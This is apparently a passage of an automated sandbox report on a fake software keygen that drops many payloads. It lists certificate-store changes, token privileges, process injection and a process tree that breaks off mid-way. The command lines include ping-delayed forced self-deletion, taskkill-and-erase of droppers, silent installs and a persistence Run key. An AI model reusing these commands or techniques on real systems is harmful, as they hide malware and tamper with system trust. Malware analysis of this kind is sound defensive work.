5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC tapinstall.exe -
Runs ping.exe 1 TTPs 3 IoCs
Processes:
PING.EXEPING.EXEPING.EXEpid process 2456 PING.EXE 5976 PING.EXE 5744 PING.EXE -
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 103 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 113 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 247 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 250 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
setups.tmpmultitimer.exerundll32.exesvchost.exefile.exeIBInstaller_97039.tmp4hwdecwinxm.tmpwin1host.exevpn.tmpsetups.tmpjfiag3g_gg.exerundll32.exerundll32.exe1.exeirecord.tmpprolab.tmpmsiexec.exeXyqupovabu.exepid process 216 setups.tmp 216 setups.tmp 4648 multitimer.exe 4648 multitimer.exe 4648 multitimer.exe 4648 multitimer.exe 4648 multitimer.exe 4648 multitimer.exe 4648 multitimer.exe 4648 multitimer.exe 4648 multitimer.exe 4648 multitimer.exe 4648 multitimer.exe 4648 multitimer.exe 4648 multitimer.exe 4648 multitimer.exe 4648 multitimer.exe 4648 multitimer.exe 4648 multitimer.exe 4648 multitimer.exe 232 rundll32.exe 232 rundll32.exe 4840 svchost.exe 4840 svchost.exe 2264 file.exe 2264 file.exe 2264 file.exe 2264 file.exe 2264 file.exe 2264 file.exe 2264 file.exe 2264 file.exe 5408 IBInstaller_97039.tmp 5408 IBInstaller_97039.tmp 5184 4hwdecwinxm.tmp 5184 4hwdecwinxm.tmp 5856 win1host.exe 5856 win1host.exe 5856 win1host.exe 5856 win1host.exe 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 972 setups.tmp 972 setups.tmp 5188 jfiag3g_gg.exe 5188 jfiag3g_gg.exe 6096 rundll32.exe 6096 rundll32.exe 3352 rundll32.exe 3352 rundll32.exe 4176 1.exe 4176 1.exe 4300 irecord.tmp 4300 irecord.tmp 5832 prolab.tmp 5832 prolab.tmp 412 msiexec.exe 412 msiexec.exe 532 Xyqupovabu.exe 532 Xyqupovabu.exe 532 Xyqupovabu.exe 532 Xyqupovabu.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
MicrosoftEdgeCP.exetoolspab1.exepid process 4296 MicrosoftEdgeCP.exe 4296 MicrosoftEdgeCP.exe 1864 toolspab1.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Setup.exeaskinstall20.exemultitimer.exetaskkill.exe1.exeMicrosoftEdgeCP.exemultitimer.exerundll32.exesvchost.exefile.exemsiexec.exedescription pid process Token: SeDebugPrivilege 1800 Setup.exe Token: SeCreateTokenPrivilege 4308 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 4308 askinstall20.exe Token: SeLockMemoryPrivilege 4308 askinstall20.exe Token: SeIncreaseQuotaPrivilege 4308 askinstall20.exe Token: SeMachineAccountPrivilege 4308 askinstall20.exe Token: SeTcbPrivilege 4308 askinstall20.exe Token: SeSecurityPrivilege 4308 askinstall20.exe Token: SeTakeOwnershipPrivilege 4308 askinstall20.exe Token: SeLoadDriverPrivilege 4308 askinstall20.exe Token: SeSystemProfilePrivilege 4308 askinstall20.exe Token: SeSystemtimePrivilege 4308 askinstall20.exe Token: SeProfSingleProcessPrivilege 4308 askinstall20.exe Token: SeIncBasePriorityPrivilege 4308 askinstall20.exe Token: SeCreatePagefilePrivilege 4308 askinstall20.exe Token: SeCreatePermanentPrivilege 4308 askinstall20.exe Token: SeBackupPrivilege 4308 askinstall20.exe Token: SeRestorePrivilege 4308 askinstall20.exe Token: SeShutdownPrivilege 4308 askinstall20.exe Token: SeDebugPrivilege 4308 askinstall20.exe Token: SeAuditPrivilege 4308 askinstall20.exe Token: SeSystemEnvironmentPrivilege 4308 askinstall20.exe Token: SeChangeNotifyPrivilege 4308 askinstall20.exe Token: SeRemoteShutdownPrivilege 4308 askinstall20.exe Token: SeUndockPrivilege 4308 askinstall20.exe Token: SeSyncAgentPrivilege 4308 askinstall20.exe Token: SeEnableDelegationPrivilege 4308 askinstall20.exe Token: SeManageVolumePrivilege 4308 askinstall20.exe Token: SeImpersonatePrivilege 4308 askinstall20.exe Token: SeCreateGlobalPrivilege 4308 askinstall20.exe Token: 31 4308 askinstall20.exe Token: 32 4308 askinstall20.exe Token: 33 4308 askinstall20.exe Token: 34 4308 askinstall20.exe Token: 35 4308 askinstall20.exe Token: SeDebugPrivilege 4648 multitimer.exe Token: SeDebugPrivilege 812 taskkill.exe Token: SeDebugPrivilege 4176 1.exe Token: SeDebugPrivilege 4176 1.exe Token: SeDebugPrivilege 4176 1.exe Token: SeDebugPrivilege 4176 1.exe Token: SeDebugPrivilege 4468 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4468 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4468 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4468 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1216 multitimer.exe Token: SeDebugPrivilege 4176 1.exe Token: SeDebugPrivilege 232 rundll32.exe Token: SeTcbPrivilege 4840 svchost.exe Token: SeDebugPrivilege 232 rundll32.exe Token: SeDebugPrivilege 232 rundll32.exe Token: SeDebugPrivilege 232 rundll32.exe Token: SeDebugPrivilege 232 rundll32.exe Token: SeDebugPrivilege 232 rundll32.exe Token: SeDebugPrivilege 232 rundll32.exe Token: SeDebugPrivilege 232 rundll32.exe Token: SeDebugPrivilege 232 rundll32.exe Token: SeDebugPrivilege 232 rundll32.exe Token: SeDebugPrivilege 232 rundll32.exe Token: SeDebugPrivilege 232 rundll32.exe Token: SeDebugPrivilege 232 rundll32.exe Token: SeDebugPrivilege 2264 file.exe Token: SeLockMemoryPrivilege 3740 msiexec.exe Token: SeLockMemoryPrivilege 3740 msiexec.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
Setup3310.tmpIBInstaller_97039.tmphqm5br3cap4.exevict.tmp4hwdecwinxm.tmpvpn.tmppid process 5216 Setup3310.tmp 5408 IBInstaller_97039.tmp 5560 hqm5br3cap4.exe 5264 vict.tmp 5184 4hwdecwinxm.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp 5840 vpn.tmp -
Suspicious use of SetWindowsHookEx 53 IoCs
Processes:
setups.exesetups.tmp1.exeMicrosoftEdgeCP.exe4hwdecwinxm.exevict.execpyrix.exeSetup3310.exe4hwdecwinxm.tmpSetup3310.tmpvict.tmpIBInstaller_97039.exeIBInstaller_97039.tmpvpn.exevpn.tmpwin1host.exewinlthsth.exeSetup.exehjjgaa.exejg7_7wjg.exeRunWW.exeLabPicV3.exelylal220.exeguihuali-game.exeLabPicV3.tmplylal220.tmp22.exejfiag3g_gg.exesetups.exesetups.tmpjfiag3g_gg.exetapinstall.exeirecord.exeirecord.tmpprolab.exeprolab.tmptapinstall.exeMicrosoftEdge.execpyrix.exevict.exeSetup3310.exevict.tmpSetup3310.tmpvpn.exevpn.tmpmd6_6ydj.exemd6_6ydj.exeaskinstall31.exeaskinstall31.exewin1host.exeSetup.exedw20.exepid process 4624 setups.exe 216 setups.tmp 4176 1.exe 4296 MicrosoftEdgeCP.exe 4296 MicrosoftEdgeCP.exe 4476 4hwdecwinxm.exe 844 vict.exe 2640 cpyrix.exe 1968 Setup3310.exe 5184 4hwdecwinxm.tmp 5216 Setup3310.tmp 5264 vict.tmp 5356 IBInstaller_97039.exe 5408 IBInstaller_97039.tmp 5732 vpn.exe 5840 vpn.tmp 5856 win1host.exe 5908 winlthsth.exe 3524 Setup.exe 4512 hjjgaa.exe 3592 jg7_7wjg.exe 4664 RunWW.exe 5388 LabPicV3.exe 5364 lylal220.exe 5484 guihuali-game.exe 3116 LabPicV3.tmp 5244 lylal220.tmp 5440 22.exe 4380 jfiag3g_gg.exe 5296 setups.exe 972 setups.tmp 5188 jfiag3g_gg.exe 5696 tapinstall.exe 5384 irecord.exe 4300 irecord.tmp 3404 prolab.exe 5832 prolab.tmp 3256 tapinstall.exe 5340 MicrosoftEdge.exe 6404 cpyrix.exe 6428 vict.exe 6568 Setup3310.exe 6628 vict.tmp 6700 Setup3310.tmp 324 vpn.exe 6908 vpn.tmp 5884 md6_6ydj.exe 4076 md6_6ydj.exe 6508 askinstall31.exe 204 askinstall31.exe 6048 win1host.exe 6904 Setup.exe 3056 dw20.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Big_Buck_Hunter_Pro_v3_0_10_keygen_by_Inferno.execmd.exekeygen-pr.exekeygen-step-4.exekeygen-step-3.execmd.exekey.exeSetup.exesetups.exeaskinstall20.execmd.exemultitimer.exemultitimer.exeFull_Version.exeWScript.exerundll32.exesvchost.exedescription pid process target process PID 4688 wrote to memory of 3884 4688 Big_Buck_Hunter_Pro_v3_0_10_keygen_by_Inferno.exe cmd.exe PID 4688 wrote to memory of 3884 4688 Big_Buck_Hunter_Pro_v3_0_10_keygen_by_Inferno.exe cmd.exe PID 4688 wrote to memory of 3884 4688 Big_Buck_Hunter_Pro_v3_0_10_keygen_by_Inferno.exe cmd.exe PID 3884 wrote to memory of 4064 3884 cmd.exe keygen-pr.exe PID 3884 wrote to memory of 4064 3884 cmd.exe keygen-pr.exe PID 3884 wrote to memory of 4064 3884 cmd.exe keygen-pr.exe PID 3884 wrote to memory of 4080 3884 cmd.exe keygen-step-1.exe PID 3884 wrote to memory of 4080 3884 cmd.exe keygen-step-1.exe PID 3884 wrote to memory of 4080 3884 cmd.exe keygen-step-1.exe PID 3884 wrote to memory of 3488 3884 cmd.exe keygen-step-3.exe PID 3884 wrote to memory of 3488 3884 cmd.exe keygen-step-3.exe PID 3884 wrote to memory of 3488 3884 cmd.exe keygen-step-3.exe PID 3884 wrote to memory of 4412 3884 cmd.exe keygen-step-4.exe PID 3884 wrote to memory of 4412 3884 cmd.exe keygen-step-4.exe PID 3884 wrote to memory of 4412 3884 cmd.exe keygen-step-4.exe PID 4064 wrote to memory of 1616 4064 keygen-pr.exe key.exe PID 4064 wrote to memory of 1616 4064 keygen-pr.exe key.exe PID 4064 wrote to memory of 1616 4064 keygen-pr.exe key.exe PID 4412 wrote to memory of 1800 4412 keygen-step-4.exe Setup.exe PID 4412 wrote to memory of 1800 4412 keygen-step-4.exe Setup.exe PID 3488 wrote to memory of 2288 3488 keygen-step-3.exe cmd.exe PID 3488 wrote to memory of 2288 3488 keygen-step-3.exe cmd.exe PID 3488 wrote to memory of 2288 3488 keygen-step-3.exe cmd.exe PID 2288 wrote to memory of 2456 2288 cmd.exe PING.EXE PID 2288 wrote to memory of 2456 2288 cmd.exe PING.EXE PID 2288 wrote to memory of 2456 2288 cmd.exe PING.EXE PID 1616 wrote to memory of 2484 1616 key.exe key.exe PID 1616 wrote to memory of 2484 1616 key.exe key.exe PID 1616 wrote to memory of 2484 1616 key.exe key.exe PID 1800 wrote to memory of 4648 1800 Setup.exe multitimer.exe PID 1800 wrote to memory of 4648 1800 Setup.exe multitimer.exe PID 1800 wrote to memory of 4624 1800 Setup.exe setups.exe PID 1800 wrote to memory of 4624 1800 Setup.exe setups.exe PID 1800 wrote to memory of 4624 1800 Setup.exe setups.exe PID 4624 wrote to memory of 216 4624 setups.exe setups.tmp PID 4624 wrote to memory of 216 4624 setups.exe setups.tmp PID 4624 wrote to memory of 216 4624 setups.exe setups.tmp PID 4412 wrote to memory of 4308 4412 keygen-step-4.exe askinstall20.exe PID 4412 wrote to memory of 4308 4412 keygen-step-4.exe askinstall20.exe PID 4412 wrote to memory of 4308 4412 keygen-step-4.exe askinstall20.exe PID 4308 wrote to memory of 2976 4308 askinstall20.exe cmd.exe PID 4308 wrote to memory of 2976 4308 askinstall20.exe cmd.exe PID 4308 wrote to memory of 2976 4308 askinstall20.exe cmd.exe PID 2976 wrote to memory of 812 2976 cmd.exe taskkill.exe PID 2976 wrote to memory of 812 2976 cmd.exe taskkill.exe PID 2976 wrote to memory of 812 2976 cmd.exe taskkill.exe PID 4648 wrote to memory of 4576 4648 multitimer.exe multitimer.exe PID 4648 wrote to memory of 4576 4648 multitimer.exe multitimer.exe PID 4576 wrote to memory of 1216 4576 multitimer.exe multitimer.exe PID 4576 wrote to memory of 1216 4576 multitimer.exe multitimer.exe PID 4412 wrote to memory of 1180 4412 keygen-step-4.exe Full_Version.exe PID 4412 wrote to memory of 1180 4412 keygen-step-4.exe Full_Version.exe PID 4412 wrote to memory of 1180 4412 keygen-step-4.exe Full_Version.exe PID 1180 wrote to memory of 2460 1180 Full_Version.exe WScript.exe PID 1180 wrote to memory of 2460 1180 Full_Version.exe WScript.exe PID 1180 wrote to memory of 2460 1180 Full_Version.exe WScript.exe PID 4412 wrote to memory of 2264 4412 keygen-step-4.exe file.exe PID 4412 wrote to memory of 2264 4412 keygen-step-4.exe file.exe PID 4412 wrote to memory of 2264 4412 keygen-step-4.exe file.exe PID 2460 wrote to memory of 232 2460 WScript.exe rundll32.exe PID 2460 wrote to memory of 232 2460 WScript.exe rundll32.exe PID 2460 wrote to memory of 232 2460 WScript.exe rundll32.exe PID 232 wrote to memory of 4840 232 rundll32.exe svchost.exe PID 4840 wrote to memory of 5056 4840 svchost.exe svchost.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1048
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1196
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1260
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1884
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
- Modifies registry class
PID:2412
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2376
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2216
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2200
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1376
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2616
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵PID:364
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:392
-
C:\Users\Admin\AppData\Local\Temp\Big_Buck_Hunter_Pro_v3_0_10_keygen_by_Inferno.exe"C:\Users\Admin\AppData\Local\Temp\Big_Buck_Hunter_Pro_v3_0_10_keygen_by_Inferno.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4688 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:2484
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:4080
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3488 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2456
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4412 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Users\Admin\AppData\Local\Temp\P8K0PL31T3\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\P8K0PL31T3\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4648 -
C:\Users\Admin\AppData\Local\Temp\P8K0PL31T3\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\P8K0PL31T3\multitimer.exe" 1 3.1617560608.606a0420d9c46 1016⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Users\Admin\AppData\Local\Temp\P8K0PL31T3\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\P8K0PL31T3\multitimer.exe" 2 3.1617560608.606a0420d9c467⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Suspicious use of AdjustPrivilegeToken
PID:1216 -
C:\Users\Admin\AppData\Local\Temp\jernts3htbo\4hwdecwinxm.exe"C:\Users\Admin\AppData\Local\Temp\jernts3htbo\4hwdecwinxm.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4476 -
C:\Users\Admin\AppData\Local\Temp\is-KAOLL.tmp\4hwdecwinxm.tmp"C:\Users\Admin\AppData\Local\Temp\is-KAOLL.tmp\4hwdecwinxm.tmp" /SL5="$502F4,2592217,780800,C:\Users\Admin\AppData\Local\Temp\jernts3htbo\4hwdecwinxm.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5184 -
C:\Users\Admin\AppData\Local\Temp\is-ULADM.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-ULADM.tmp\winlthsth.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5908
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\lctgdklzna3\dmtzmsnvpdi.exe"C:\Users\Admin\AppData\Local\Temp\lctgdklzna3\dmtzmsnvpdi.exe"8⤵
- Executes dropped EXE
PID:5164 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\lctgdklzna3\dmtzmsnvpdi.exe"9⤵PID:5772
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:5976
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4lgleqdvkqx\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\4lgleqdvkqx\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5356 -
C:\Users\Admin\AppData\Local\Temp\is-32FF8.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-32FF8.tmp\IBInstaller_97039.tmp" /SL5="$30302,14575146,721408,C:\Users\Admin\AppData\Local\Temp\4lgleqdvkqx\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5408 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-F4H3S.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵PID:5548
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-F4H3S.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵
- Drops file in Windows directory
PID:5724
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\oywxaxkoyd3\app.exe"C:\Users\Admin\AppData\Local\Temp\oywxaxkoyd3\app.exe" /8-238⤵
- Executes dropped EXE
PID:5148
-
-
C:\Users\Admin\AppData\Local\Temp\5nrnfjanddr\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\5nrnfjanddr\Setup3310.exe" /Verysilent /subid=5778⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1968
-
-
C:\Users\Admin\AppData\Local\Temp\znfcwzqx1ix\o2cudfg1p0z.exe"C:\Users\Admin\AppData\Local\Temp\znfcwzqx1ix\o2cudfg1p0z.exe" /ustwo INSTALL8⤵
- Executes dropped EXE
PID:528 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "o2cudfg1p0z.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\znfcwzqx1ix\o2cudfg1p0z.exe" & exit9⤵PID:5160
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "o2cudfg1p0z.exe" /f10⤵
- Kills process with taskkill
PID:4408
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\taxvyblzfhk\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\taxvyblzfhk\cpyrix.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2640 -
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵
- Executes dropped EXE
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Modifies Control Panel
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4176 -
C:\Users\Admin\AppData\Roaming\1.exe"{path}"10⤵
- Executes dropped EXE
PID:3304
-
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"10⤵
- Executes dropped EXE
PID:5420
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4700 -
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵
- Executes dropped EXE
PID:4472
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\cr201y5ywfk\vict.exe"C:\Users\Admin\AppData\Local\Temp\cr201y5ywfk\vict.exe" /VERYSILENT /id=5358⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:844
-
-
C:\Users\Admin\AppData\Local\Temp\w33czsemnuw\hqm5br3cap4.exe"C:\Users\Admin\AppData\Local\Temp\w33czsemnuw\hqm5br3cap4.exe" /quiet SILENT=1 AF=7568⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:5560 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\w33czsemnuw\hqm5br3cap4.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\w33czsemnuw\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617301081 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:2656
-
-
-
C:\Users\Admin\AppData\Local\Temp\nroabrjde41\vpn.exe"C:\Users\Admin\AppData\Local\Temp\nroabrjde41\vpn.exe" /silent /subid=4828⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5732 -
